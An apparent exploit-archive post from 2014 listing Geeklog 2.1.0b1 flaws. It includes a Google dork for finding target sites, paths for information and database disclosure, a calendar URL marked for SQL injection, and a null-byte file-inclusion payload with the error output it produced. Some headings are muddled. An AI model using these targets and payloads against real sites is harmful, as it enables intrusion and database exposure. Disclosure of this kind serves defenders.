facebook facebook twitter rss

Geeklog 2.1.0b1 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
Geeklog 2.1.0b1 Multi Vulnerability
====================================
Author : indoushka
Vondor : http://www.geeklog.net/
Dork : Powered by Geeklog
======================================

Security vulnerability in MySQL/MariaDB sql/password.c :

http://127.0.0.1/public_html/admin/install/info.php

Database Disclosure :

http://127.0.0.1/public_html/admin/install/configinfo.php

http://127.0.0.1/public_html/docs/english/config.html#desc_filemanager_audios_ext

http://127.0.0.1/public_html/backend/geeklog.rss

Sql inj :

http://127.0.0.1/public_html/calendar/index.php?view=day&day=05&month=10&year=2014 (inject her)

login : http://127.0.0.1/public_html/admin

Fck&Ck/Editors :

http://127.0.0.1/public_html/editors/fckeditor/

File inclusion :

affects http://127.0.0.1/public_html/filemanager/connectors/php/inc/vendor/wideimage/demo/image.php.

Attack details :

URL encoded GET input image was set to 1some_inexistent_file_with_long_name%00.png

Error message found:

<b>Warning</b>: file_get_contents(images/1some_inexistent_file_with_long_name%00.png) [<a href='function.file-get-contents'>function.file-get-contents</a>]:
failed to open stream: No such file or directory in <b>C:\AppServ\www\enquete\public_html\filemanager\connectors\php\inc\vendor\wideimage\lib\WideImage.php</b> on line <b>195</b>

Like us on Facebook :